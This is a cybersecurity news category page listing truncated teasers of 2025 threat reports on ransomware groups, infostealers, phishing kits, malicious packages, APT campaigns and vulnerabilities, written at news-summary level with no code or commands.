Category: Threats

Scattered Spider With New Telegram Channel List Organizations It Attacked In early August 2025, a previously quiet cybercrime collective known as Scattered Spider resurfaced with a striking new Telegram channel that aggregates proof of its intrusions and data exfiltration operations. The channel name fuses ShinyHunters, Scattered Spider, and Lapsus$, signaling a collaboration—or at least a…

Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets A sophisticated cryptocurrency theft campaign has emerged targeting the Bittensor ecosystem through malicious Python packages distributed via the Python Package Index (PyPI). The attack leverages typosquatting techniques to deceive developers and users into installing compromised versions of legitimate Bittensor packages, ultimately resulting in…

Huge Wave of Malicious Efimer Malicious Script Attack Users via WordPress Sites, Malicious Torrents, and Email A sophisticated malware campaign dubbed “Efimer” has emerged as a significant threat to cryptocurrency users worldwide, employing a multi-vector approach that combines compromised WordPress websites, malicious torrents, and deceptive email campaigns. First detected in October 2024, this ClipBanker-type Trojan…

5,000+ Fake Online Pharmacies Websites Selling Counterfeit Medicines A sophisticated cybercriminal enterprise operating over 5,000 fraudulent online pharmacy websites has been exposed in a comprehensive investigation, revealing one of the largest pharmaceutical fraud networks ever documented. This massive operation, orchestrated by a single threat actor group, targets vulnerable individuals seeking prescription medications through deceptive digital…

DarkCloud Stealer Employs New Infection Chain and ConfuserEx-Based Obfuscation A sophisticated information-stealing malware campaign has emerged, utilizing advanced obfuscation techniques and multiple infection vectors to evade traditional security controls. The DarkCloud Stealer, first documented in recent threat intelligence reports, represents a significant evolution in cybercriminal tactics, employing a complex multi-stage delivery mechanism that begins with…

Biggest Ever GreedyBear Attack With 650 Hacking Tools Stolen $1 Million from Victims A sophisticated cybercriminal operation known as GreedyBear has orchestrated one of the most extensive cryptocurrency theft campaigns to date, deploying over 650 malicious tools across multiple attack vectors to steal more than $1 million from unsuspecting victims. Unlike traditional threat groups that…

HashiCorp Vault 0-Day Vulnerabilities Let Attackers Execute Remote Code Security researchers uncovered a series of critical zero-day vulnerabilities in HashiCorp Vault in early August 2025, the widely adopted secrets management solution. These flaws, spanning authentication bypasses, policy enforcement inconsistencies, and audit-log abuse, create end-to-end attack paths that culminate in remote code execution (RCE) on Vault…

Threat Actors Weaponizing RMM Tools to Take Control of The Machine and Steal Data Cybercriminals are increasingly exploiting Remote Monitoring and Management (RMM) software to gain unauthorized access to corporate systems, with a sophisticated new attack campaign demonstrating how legitimate IT tools can become powerful weapons in the wrong hands. This emerging threat leverages the…

Bing Search Poisoned to Deliver Bumblebee Malware for ‘ManageEngine OpManager’ Searches A sophisticated search engine optimization (SEO) poisoning campaign that exploited Bing search results to distribute Bumblebee malware, ultimately leading to devastating Akira ransomware attacks. The campaign, active throughout July 2025, specifically targeted users searching for legitimate IT management software, demonstrating how threat actors continue…

New Android Malware Mimics as SBI Card, Axis Bank Apps to Steal Users Financial Data A sophisticated new Android malware campaign has emerged targeting Indian banking customers through convincing impersonations of popular financial applications. The malicious software masquerades as legitimate apps from major Indian financial institutions, including SBI Card, Axis Bank, Indusind Bank, ICICI, and…

Microsoft PlayReady DRM Used by Netflix, Amazon, and Disney+ Leaked Online A significant security breach has compromised Microsoft’s PlayReady Digital Rights Management (DRM) system, exposing critical certificates that protect premium streaming content across major platforms including Netflix, Amazon Prime Video, and Disney+. The leak, which surfaced on GitHub through an account named “Widevineleak,” has triggered…

Interlock Ransomware Employs ClickFix Technique to Run Malicious Commands on Windows Machines The cybersecurity landscape continues to evolve as threat actors develop increasingly sophisticated methods to compromise Windows systems. A new ransomware variant known as Interlock has emerged as a significant threat, leveraging the deceptive ClickFix social engineering technique to execute malicious commands on victim…

Lazarus Hackers Weaponized 234 Packages Across npm and PyPI to Infect Developers A sophisticated cyber espionage campaign targeting software developers has infiltrated two of the world’s largest open source package repositories, with North Korea’s notorious Lazarus Group successfully deploying 234 malicious packages across npm and PyPI ecosystems. Between January and July 2025, this state-sponsored operation…

SafePay Ransomware Infected 260+ Victims Across Multiple Countries A new ransomware threat has emerged as one of the most aggressive cybercriminal operations of 2025, with SafePay ransomware claiming responsibility for over 265 successful attacks spanning multiple continents. The group, which first appeared in September 2024 with limited activity targeting just over 20 victims, has dramatically…

Qilin Ransomware Surging Following The Fall of dominant RansomHub RaaS The ransomware landscape experienced a significant shift in the second quarter of 2025 as Qilin ransomware emerged as the dominant threat following the unexpected collapse of RansomHub, previously the most prolific ransomware-as-a-service operation. This transition has reshaped the cybercriminal ecosystem, with Qilin capitalizing on the…

LockBit Operators Using Stealthy DLL Sideloading Technique to Load Malicious App as Legitimate One LockBit ransomware operators have adopted an increasingly sophisticated approach to evade detection by leveraging DLL sideloading techniques that exploit the inherent trust placed in legitimate applications. This stealthy method involves tricking legitimate, digitally signed applications into loading malicious Dynamic Link Libraries…

Unit 42 Unveils Attribution Framework to Classify Threat Actors Based on Activity Palo Alto Networks’ Unit 42 threat research team has introduced a groundbreaking systematic approach to threat actor attribution, addressing longstanding challenges in cybersecurity intelligence analysis. The Unit 42 Attribution Framework, unveiled on July 31, 2025, transforms what has traditionally been considered “more art…

Threat Actors Embed Malicious RMM Tools to Gain Silent Initial Access to Organizations A sophisticated cyber campaign leveraging legitimate Remote Monitoring and Management (RMM) tools has emerged as a significant threat to European organizations, particularly those in France and Luxembourg. Since November 2024, threat actors have been deploying carefully crafted PDF documents containing embedded links…

Navigating APTs – Singapore’s Cautious Response to State-Linked Cyber Attacks Singapore’s cybersecurity landscape faced a significant challenge in July 2025 when Coordinating Minister K. Shanmugam disclosed that the nation was actively defending against UNC3886, a highly sophisticated Advanced Persistent Threat (APT) group targeting critical infrastructure. The revelation, announced during the Cyber Security Agency’s 10th anniversary…

APT Hackers Attacking Maritime and Shipping Industry to Launch Ransomware Attacks The maritime industry, which facilitates approximately 90% of global trade, has emerged as a critical battleground for advanced persistent threat (APT) groups deploying sophisticated ransomware campaigns. This surge in cyber warfare represents a paradigm shift where state-sponsored hackers and financially motivated threat actors are…

Gunra Ransomware New Linux Variant Runs Up To 100 Encryption Threads With New Partial Encryption Feature A sophisticated new Linux variant of Gunra ransomware has emerged, marking a significant escalation in the threat group’s cross-platform capabilities since its initial discovery in April 2025. The ransomware, which drew inspiration from the notorious Conti ransomware techniques, has…

Qilin Ransomware Leverages TPwSav.sys Driver to Disable EDR Security Measures Cybercriminals have once again demonstrated their evolving sophistication by weaponizing an obscure Toshiba laptop driver to bypass endpoint detection and response systems. The Qilin ransomware operation, active since July 2022, has incorporated a previously unknown vulnerable driver called TPwSav.sys into their attack arsenal, enabling them…

Lionishackers Threat Actors Exfiltrating and Selling Corporate Databases on Dark Web A financially motivated threat actor known as Lionishackers has emerged as a significant player in the illicit marketplace for corporate data in recent months. Leveraging opportunistic targeting and a preference for Asian-based victims, the group employs automated SQL injection tools to breach database servers,…

Malicious Android Apps Mimic as Popular Indian Banking Apps Steal Login Credentials Attackers are weaponizing India’s appetite for mobile banking by circulating counterfeit Android apps that mimic the interfaces and icons of public-sector and private banks. Surfacing in telemetry logs on 3 April 2025, the impostors travel through smishing texts, QR codes and search-engine poisoning,…

New Malware Attack Leverages YouTube Channels and Discord to Harvest Credentials from Computer A newly uncovered campaign is exploiting gamers’ enthusiasm for off-beat indie titles to plant credential-stealing malware on machines. Branded installers for nonexistent games such as “Baruda Quest,” “Warstorm Fire,” and “Dire Talon” are pushed through slick YouTube trailers and Discord download links…

GLOBAL GROUP’s Golang Ransomware Attacks Windows, Linux, and macOS Environments A sophisticated new ransomware threat has emerged from the cybercriminal underground, targeting organizations across multiple operating systems with advanced cross-platform capabilities. In June 2025, a ransomware actor operating under the alias “Dollar Dollar Dollar” introduced GLOBAL GROUP on the Ramp4u cybercrime forum, marketing it as…

Greedy Sponge Hackers Attacking Financial Institutions With Modified Version of AllaKore RAT A financially motivated threat group dubbed Greedy Sponge has been systematically targeting Mexican financial institutions and organizations since 2021 with a heavily modified version of the AllaKore remote access trojan (RAT). The campaign represents a sophisticated evolution of cybercriminal tactics, combining traditional social…

New Veeam Themed Phishing Attack Using Weaponized Wav File to Attack users A sophisticated phishing campaign targeting organizations has emerged, exploiting the trusted reputation of Veeam Software through weaponized WAV audio files delivered via email. The attack represents an evolution in social engineering tactics, combining traditional phishing techniques with audio-based deception to bypass conventional security…

Chinese Threat Actors Using 2,800 Malicious Domains to Deliver Windows-Specific Malware A sophisticated Chinese threat actor campaign has emerged as one of the most persistent malware distribution operations targeting Chinese-speaking communities worldwide. Since June 2023, this ongoing campaign has established an extensive infrastructure comprising more than 2,800 malicious domains specifically designed to deliver Windows-targeted malware…

Snake Keylogger Evades Windows Defender and Scheduled Tasks to Harvest Login Credentials A sophisticated phishing campaign targeting Turkish defense and aerospace enterprises has emerged, delivering a highly evasive variant of the Snake Keylogger malware through fraudulent emails impersonating TUSAŞ (Turkish Aerospace Industries). The malicious campaign distributes files disguised as contractual documents, specifically using the filename…

Lumma Infostealer Steal All Data Stored in Browsers and Selling Them in Underground Markets as Logs The cybersecurity landscape continues to face significant threats from sophisticated information stealers, with Lumma emerging as one of the most prevalent and dangerous malware families targeting both consumer and enterprise environments. This malicious software systematically harvests enormous volumes of…

New Wave of Crypto-Hijacking Infects 3,500+ Websites A stealth Monero-mining campaign has quietly compromised more than 3,500 websites by embedding an innocuous-looking JavaScript file called karma.js. The operation leverages WebAssembly, Web Workers, and WebSockets to siphon CPU cycles while keeping resource usage low enough to avoid user suspicion. Cside.dev analysts first noted the anomaly after…

Google Sued BadBox 2.0 Malware Botnet Operators That Infects 10 Million+ Devices Google has filed a lawsuit in New York federal court against the operators of the BadBox 2.0 botnet, marking a significant escalation in the tech giant’s fight against cybercriminal networks. The malware campaign represents the largest known botnet of internet-connected television devices, compromising…

Fancy Bear Hackers Attacking Governments, Military Entities With New Sophisticated Tools The notorious Russian cyberespionage group Fancy Bear, also known as APT28, has intensified its operations against governments and military entities worldwide using an arsenal of sophisticated new tools and techniques. Active since 2007, this state-sponsored threat actor has established itself as one of the…

Chinese State-Sponsored Hackers Attacking Semiconductor Industry with Weaponized Cobalt Strike A sophisticated Chinese state-sponsored cyber espionage campaign has emerged targeting Taiwan’s critical semiconductor industry, employing weaponized Cobalt Strike beacons and advanced social engineering tactics. Between March and June 2025, multiple threat actors launched coordinated attacks against semiconductor manufacturing, design, and supply chain organizations, reflecting China’s…

Ukraine Hackers Claimed Cyberattack on Major Russian Drone Supplier Last week, Ukraine’s Main Intelligence Directorate (GUR) orchestrated a sophisticated cyberattack against Gaskar Integration, a leading Russian drone manufacturer. The operation began with reconnaissance of the company’s public-facing infrastructure, where threat actors identified vulnerable remote desktop services and outdated VPN gateways. Leveraging a zero-day in a…

H2Miner Attacking Linux, Windows, and Containers to Mine Monero The H2Miner botnet, first observed in late 2019, has resurfaced with an expanded arsenal that blurs the line between cryptojacking and ransomware. The latest campaign leverages inexpensive virtual private servers (VPS) and a grab-bag of commodity malware to compromise Linux hosts, Windows workstations, and container workloads…

Researchers Uncover on How Hacktivist Groups Gaining Attention and Selecting Targets The global hacktivist landscape has undergone a dramatic transformation since 2022, evolving from primarily ideologically motivated actors into a complex ecosystem where attention-seeking behavior and monetization strategies drive operational decisions. This shift has fundamentally altered how these groups select targets and conduct campaigns, creating…

Threat Actors Weaponizing SVG Files to Embed Malicious JavaScript Threat actors are quietly turning Scalable Vector Graphics (SVG) files into precision-guided malware. In a surge of phishing campaigns, seemingly innocuous .svg attachments slip past secure email gateways because mail filters regard them as static images. Once the recipient merely previews the file, hidden JavaScript executes…

Infostealers Distributed with Crack Apps Emerges as Top Attack Vector For June 2025 The cybersecurity landscape in June 2025 was dominated by a surge of Infostealer malware masked as cracked or key-generated software, catapulting this tactic to the month’s most prevalent attack vector. Fraudulent download portals advertising “free” versions of popular tools lured victims through…

Microsoft Details on How Security Copilot in Intune and Entra Helps Security and IT Teams Microsoft has announced significant enhancements to its AI-powered security platform, marking the general availability of Microsoft Security Copilot capabilities within Microsoft Intune and Microsoft Entra. This development represents a critical milestone in the evolution of enterprise security management, as organizations…

Dark 101 Ransomware With Weaponized .NET Binary Disables Recovery Mode and Task Manager A sophisticated new ransomware strain has emerged in the cybersecurity landscape, demonstrating advanced evasion techniques and destructive capabilities that pose significant risks to organizations worldwide. The Dark 101 ransomware represents a concerning evolution in malware design, utilizing an obfuscated .NET binary to…

Albemarle County Hit By Ransomware Attack – Hackers Accessed Residents Personal Details Albemarle County, Virginia, has fallen victim to a sophisticated ransomware attack that compromised the personal information of county residents, local government employees, and public school staff. The cybercriminal operation successfully infiltrated the county’s network infrastructure, forcing officials to launch an extensive incident response…

Qilin Emerged as The Most Active Group, Exploiting Unpatched Fortinet Vulnerabilities The ransomware landscape witnessed a dramatic shift in June 2025 as the Qilin ransomware group surged to become the most active threat actor, recording 81 victims and representing a staggering 47.3% increase in activity compared to previous months. This Ransomware-as-a-Service operation, which has accumulated…

AWS Organizations Mis-scoped Managed Policy Let Hackers To Take Full AWS Organization Control A critical security vulnerability in AWS Organizations has been discovered that could allow attackers to achieve complete control over entire multi-account AWS environments through a mis-scoped managed policy. The flaw, identified in the AmazonGuardDutyFullAccess managed policy version 1, enables privilege escalation from…

Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data The cybersecurity landscape is witnessing an alarming surge in macOS-targeted information-stealing malware, marking a significant shift from the traditional Windows-centric threat model. These sophisticated infostealers are rapidly evolving to exploit macOS environments with unprecedented precision, targeting valuable data including browser credentials, cookies, and…

Microsoft Eliminated High-Privilege Access to Enhance Microsoft 365 Security Microsoft has successfully eliminated high-privilege access vulnerabilities across its Microsoft 365 ecosystem as part of its comprehensive Secure Future Initiative, marking a significant milestone in enterprise security architecture. The technology giant’s Deputy Chief Information Security Officer for Experiences and Devices, Naresh Kannan, announced that the company…

Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating. At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to “verify” their session by…

Russia Jailed Hacker Who Worked for Ukrainian Intelligence to Launch Cyberattacks on Critical Infrastructure Russian Federal Security Service (FSB) officers have detained two hackers in Siberia who conducted cyberattacks on critical infrastructure facilities under direct orders from Ukrainian intelligence services. The simultaneous arrests in the Kemerovo and Tomsk regions exposed a sophisticated cyber espionage network…

Threat Actors Turning Job Offers Into Traps, Over $264 Million Lost in 2024 Alone Cybercriminals are exploiting the economic uncertainty and remote work trends to orchestrate sophisticated employment fraud schemes, with victims losing over $264 million in 2024 alone according to FBI reports. These malicious campaigns, known as “task scams,” represent a rapidly evolving threat…

Hackers Exploit Legitimate Inno Setup Installer to Use as a Malware Delivery Vehicle Cybercriminals have increasingly turned to legitimate software installation frameworks as vehicles for malware distribution, with Inno Setup emerging as a preferred tool for threat actors seeking to bypass security measures. This legitimate Windows installer framework, originally designed to simplify software deployment, has…

Researchers Uncover New Technique to Exploit Azure Arc for Hybrid Escalation in Enterprise Environment and Maintain Persistence Cybersecurity researchers have discovered a sophisticated attack technique that exploits Microsoft Azure Arc deployments to gain persistent access to enterprise environments. The research, conducted during recent red team operations, reveals how adversaries can leverage misconfigured Azure Arc installations…

Hackers Exploiting Java Debug Wire Protocol Servers in Wild to Deploy Cryptomining Payload A new wave of cyberattacks is targeting organizations that inadvertently expose Java Debug Wire Protocol (JDWP) servers to the internet, with attackers leveraging this overlooked entry point to deploy sophisticated cryptomining malware. JDWP, a standard feature in the Java platform, is designed…

Massive Android Ad Fraud ‘IconAds’ Leverages Google Play to Attack Phone Users A sophisticated mobile ad fraud operation dubbed “IconAds” has infiltrated Android devices worldwide through 352 malicious applications distributed via Google Play Store, generating up to 1.2 billion fraudulent bid requests daily at its peak. The scheme represents a significant evolution in mobile advertising…

Hackers use Fake Cloudflare Verification Screen to Trick Users into Executing Malware A sophisticated social engineering campaign has emerged targeting unsuspecting users through fraudulent Cloudflare verification screens, representing a new evolution in malware distribution tactics. This attack method leverages the trusted appearance of legitimate web security services to deceive victims into executing malicious code on…

Chinese Student Charged for Running a Mass Smishing Campaign to Harvest Victims Personal Details A sophisticated smishing operation targeting tens of thousands of potential victims across Greater London has resulted in the sentencing of Ruichen Xiong, a Chinese student, to over a year in prison at Inner London Crown Court. The case represents a significant…

TA829 Hackers Employs New TTPs and Upgraded RomCom Backdoor to Evade Detections The cybersecurity landscape faces a renewed threat as TA829, a sophisticated threat actor group, has emerged with enhanced tactics, techniques, and procedures (TTPs) alongside an upgraded version of the notorious RomCom backdoor. This hybrid cybercriminal-espionage group has demonstrated remarkable adaptability, conducting both financially…

Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines The notorious North Korean threat group Kimsuky has adopted a sophisticated social engineering tactic known as “ClickFix” to deceive users into executing malicious scripts on their own systems. Originally introduced by Proofpoint researchers in April 2024, this deceptive technique tricks victims into believing…

North Korean Remote IT Workers Added New Tactics and Techniques to Infiltrate Organizations North Korean state-sponsored remote IT workers have significantly evolved their infiltration tactics, incorporating artificial intelligence tools and sophisticated deception techniques to penetrate organizations worldwide. Since 2024, these highly skilled operatives have enhanced their fraudulent employment schemes by leveraging AI-powered image manipulation, voice-changing…

CISA Warns of Iranian Cyber Actors May Attack U.S. Critical Infrastructure The Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI, Department of Defense Cyber Crime Center, and National Security Agency, has issued an urgent warning regarding potential cyber attacks by Iranian-affiliated actors targeting U.S. critical infrastructure. Despite ongoing ceasefire negotiations and diplomatic efforts,…

Androxgh0st Botnet Operators Exploiting US University For Hosting C2 Logger The Androxgh0st botnet has significantly expanded its operations since 2023, with cybercriminals now compromising prestigious academic institutions to host their command and control infrastructure. This sophisticated malware campaign has demonstrated remarkable persistence and evolution, targeting a diverse range of vulnerabilities across web applications, frameworks, and…

TeamFiltration Pentesting Tool Weaponized to Hijack Microsoft Teams, Outlook, and Other Accounts A sophisticated cyberattack campaign has weaponized a legitimate penetration testing framework to compromise thousands of Microsoft cloud accounts across hundreds of organizations worldwide. The malicious operation, designated UNK_SneakyStrike, leverages TeamFiltration, a popular cybersecurity tool originally designed for Office 365 security assessments, to conduct…

Sophisticated Malware Campaign Targets WordPress and WooCommerce Sites with Obfuscated Skimmers A sophisticated malware campaign has emerged targeting WordPress and WooCommerce websites with highly obfuscated credit card skimmers and credential theft capabilities, representing a significant escalation in e-commerce cyberthreats. The malware family demonstrates advanced technical sophistication through its modular architecture, featuring multiple variants designed for…

North Korean Hackers Trick Users With Weaponized Zoom Apps to Execute System-Takeover Commands A sophisticated cybercriminal campaign has emerged targeting professionals through meticulously crafted fake Zoom applications designed to execute system takeover commands. The attack leverages advanced social engineering techniques combined with convincing domain spoofing to deceive users into compromising their systems, representing a significant…

LapDogs Hackers Leverages 1,000 SOHO Devices Using a Custom Backdoor to Act Covertly A sophisticated China-linked cyber espionage campaign has emerged, targeting over 1,000 Small Office/Home Office (SOHO) devices worldwide through an advanced Operational Relay Box (ORB) network dubbed “LapDogs.” This covert infrastructure operation, active since September 2023, represents a significant evolution in nation-state cyber…

BlueNoroff Hackers Weaponize Zoom App to Attack System Using Infostealer Malware A sophisticated social engineering campaign leveraging the trusted Zoom platform has emerged as the latest weapon in the arsenal of North Korean state-sponsored hackers. The BlueNoroff group, a financially motivated subgroup of the notorious Lazarus Group, has been orchestrating targeted attacks against cryptocurrency and…

NCSC Warns of ‘UMBRELLA STAND’ Malware Attacking Fortinet FortiGate Firewalls The UK’s National Cyber Security Centre (NCSC) has issued a critical warning about a sophisticated malware campaign dubbed “UMBRELLA STAND” that specifically targets internet-facing Fortinet FortiGate 100D series firewalls. This newly identified threat represents a significant escalation in attacks against network infrastructure devices, with the…

Prometei Botnet Attacking Linux Servers to Mine Cryptocurrency Cybersecurity researchers have uncovered a significant resurgence of the Prometei botnet, a sophisticated malware operation targeting Linux servers for cryptocurrency mining and credential theft. This latest campaign, observed since March 2025, demonstrates the evolving nature of cryptomining malware and its persistent threat to enterprise infrastructure worldwide. The…

Beware of Weaponized MSI Installer Mimic as WhatsApp Delivers Modified XWorm RAT Cybersecurity professionals across East and Southeast Asia are facing a sophisticated new threat as China-linked attackers deploy a weaponized MSI installer disguised as a legitimate WhatsApp setup package. This malicious campaign represents a significant escalation in social engineering tactics, leveraging the popularity and…

PowerShell Loaders With In-Memory Execution Techniques To Evade Disk-Based Detection Cybersecurity researchers have uncovered a sophisticated PowerShell-based attack campaign that leverages advanced in-memory execution techniques to bypass traditional disk-based security controls. The malicious infrastructure spans across Chinese, Russian, and global hosting providers, demonstrating the international scope of modern cyber threats. At the center of this…

AntiDot – 3-in-1 Android Malware Let Attackers Full Control of Compromised Devices A sophisticated new Android botnet malware called AntiDot has emerged as a significant threat to mobile device security, offering cybercriminals unprecedented control over infected devices. This malicious software operates as part of a Malware-as-a-Service (MaaS) model, marketed by threat actor LARVA-398 on underground…

Hackers Leverage Cloudflare Tunnels to Infect Systems Using Stealthy Python-Based Malware A sophisticated malware campaign has emerged that exploits Cloudflare’s tunneling infrastructure to deliver multi-stage Python-based payloads, demonstrating an alarming evolution in cybercriminal tactics. The campaign, tracked as SERPENTINE#CLOUD, represents a significant escalation in the abuse of legitimate cloud services for malicious purposes, combining social…

Hackers Using ClickFix Technique to Deploy Remote Access Trojans and Data-Stealing Malware Cybersecurity researchers have documented a significant surge in attacks utilizing the ClickFix social engineering technique, which has emerged as one of the most effective methods for initial access in modern cyber campaigns. This deceptive tactic tricks users into executing malicious PowerShell commands by…

Threat Actors Attacking Cryptocurrency and Blockchain Developers with Weaponized npm and PyPI Packages The cryptocurrency and blockchain development ecosystem is facing an unprecedented surge in sophisticated malware campaigns targeting the open source supply chain. Over the past year, threat actors have significantly escalated their attacks against Web3 developers by publishing malicious packages to trusted registries…

China and Taiwan Accuse Each Other for Cyberattacks Against Critical Infrastructure Cross-strait tensions have escalated into a new domain as China and Taiwan engage in unprecedented mutual accusations of cyberwarfare targeting critical infrastructure systems. The diplomatic dispute has intensified following Taiwan President Lai Ching-te’s first year in office, during which both governments have publicly traded…

Predator Mobile Spyware Remains Consistent with New Design Changes to Evade Detection Despite sustained international pressure, sanctions, and public exposures over the past two years, the sophisticated Predator mobile spyware has demonstrated remarkable resilience, continuing to evolve and adapt its infrastructure to evade detection while maintaining operations across multiple continents. The mercenary spyware, originally developed…

Ransomware Actors Exploit Unpatched SimpleHelp RMM to Compromise Billing Software Provider Cybersecurity researchers have uncovered a sophisticated ransomware campaign targeting utility billing software providers through unpatched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) systems. The attack represents a concerning evolution in ransomware tactics, where threat actors are leveraging trusted remote access tools to establish…

Fog Ransomware Actors Exploits Pentesting Tools to Exfiltrate Data and Deploy Ransomware The Fog ransomware group has evolved beyond conventional attack methods, deploying an unprecedented arsenal of legitimate pentesting tools in a sophisticated May 2025 campaign targeting a financial institution in Asia. This latest operation marks a significant departure from typical ransomware tactics, incorporating employee…

Threat Actors Compromise 270+ Legitimate Websites With Malicious JavaScript Using JSFireTruck Obfuscation Cybersecurity researchers have uncovered a sophisticated malware campaign that leveraged an advanced JavaScript obfuscation technique to compromise hundreds of legitimate websites and redirect unsuspecting visitors to malicious content. The campaign, which infected over 269,000 webpages between March and April 2025, employed a variant…

New Rust Based InfoStealer Extracts Sensitive Data from Chromium-based Browsers A sophisticated new information-stealing malware written in the Rust programming language has emerged, demonstrating advanced capabilities to extract sensitive data from both Chromium-based and Gecko-based web browsers. The malware, known as Myth Stealer, represents a significant evolution in cybercriminal tactics, combining modern programming techniques with…

Hackers Using New ClickFix Technique To Exploits Human Error Via Fake Prompts Cybersecurity researchers have identified a sophisticated new social engineering campaign that exploits fundamental human trust in everyday computer interactions. The ClickFix technique, which has been actively deployed since March 2024, represents a dangerous evolution in cybercriminal tactics that bypasses traditional security measures by…

Hundreds of GitHub Malware Repos Targeting Novice Cybercriminals Linked to Single User A sophisticated malware distribution campaign has weaponized over 140 GitHub repositories to target inexperienced cybercriminals and gaming cheat users, representing one of the largest documented cases of supply chain attacks on the platform. The repositories, masquerading as legitimate malware tools and game cheats,…

New ClickFix Attack Exploits Fake Cloudflare Human Check to Install Malware Silently A sophisticated new social engineering attack campaign has emerged that exploits users’ familiarity with routine security checks to deliver malware through deceptive Cloudflare verification pages. The ClickFix attack technique represents a concerning evolution in phishing methodology, abandoning traditional file downloads in favor of…

Hackers Exploit AI Tools Misconfiguration To Run Malicious AI-generated Payloads Cybercriminals are increasingly leveraging misconfigured artificial intelligence tools to execute sophisticated attacks that generate and deploy malicious payloads automatically, marking a concerning evolution in threat actor capabilities. This emerging attack vector combines traditional configuration vulnerabilities with the power of AI-driven content generation, enabling attackers to…

Threat Actors Leverage Google Apps Script To Host Phishing Websites Cybercriminals have escalated their tactics by exploiting Google Apps Script, a trusted development platform, to host sophisticated phishing campaigns that bypass traditional security measures. This emerging threat represents a significant shift in how attackers leverage legitimate infrastructure to enhance the credibility of their malicious operations.…

LexisNexis Risk Solutions Data Breach Exposes 364,000 individuals personal Data LexisNexis Risk Solutions has disclosed a significant data breach affecting approximately 364,000 individuals after discovering that an unauthorized third party gained access to sensitive personal information through a compromised third-party software development platform. The cybersecurity incident, which LexisNexis learned about on April 1, 2025, actually…

Tycoon2FA Infra Used by Dadsec Hacker Group to Steal Office365 Credentials A sophisticated phishing campaign leveraging shared infrastructure between two prominent cybercriminal operations has emerged as a significant threat to Office 365 users worldwide. The Tycoon2FA Phishing-as-a-Service platform, which has been active since August 2023, has established operational connections with the notorious Storm-1575 group, also…

Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware Cybercriminals are increasingly exploiting the growing popularity of artificial intelligence tools by distributing sophisticated malware disguised as legitimate AI solution installers. This emerging threat landscape has seen malicious actors create convincing replicas of popular AI platforms, using these deceptive packages to deploy devastating…

New Rust-based InfoStealer via Fake CAPTCHA Delivers EDDIESTEALER Cybersecurity researchers have uncovered a sophisticated malware campaign leveraging deceptive CAPTCHA verification pages to distribute a newly discovered Rust-based infostealer dubbed EDDIESTEALER. This campaign represents a significant evolution in social engineering tactics, where threat actors exploit users’ familiarity with routine security verification processes to trick them into…

W3LL Phishing Kit Actively Attacking Users to Steal Outlook Login Credentials A sophisticated phishing campaign utilizing the W3LL Phishing Kit has been actively targeting users’ Microsoft Outlook credentials through elaborate impersonation techniques. First identified by Group-IB in 2022, this phishing-as-a-service (PhaaS) tool has evolved into a comprehensive ecosystem complete with its own marketplace called W3LL…

APT Group 123 Actively Attacking Windows Systems to Deliver Malicious Payloads North Korean state-sponsored threat actor APT Group 123 has intensified its cyber espionage campaign, specifically targeting Windows systems across multiple sectors globally. The group, active since at least 2012 and also tracked under aliases such as APT37, Reaper, and ScarCruft, has historically focused on…

Recurring Supply‑Chain Lapses Expose UEFI Firmware to Pre‑OS Threats A disturbing pattern of security failures in the firmware supply chain continues to expose millions of devices to pre-OS threats, potentially undermining the foundation of computer security. Between 2022 and 2025, a series of critical security incidents involving leaked cryptographic keys and mismanagement of signing certificates…

New Phishing Attack Abusing Blob URLs to Bypass SEGs and Evade Analysis Cybersecurity experts have identified a sophisticated phishing technique that exploits blob URIs (Uniform Resource Identifiers) to evade detection by Secure Email Gateways (SEGs) and security analysis tools. This emerging attack method leverages the unique properties of blob URIs, which are designed to display…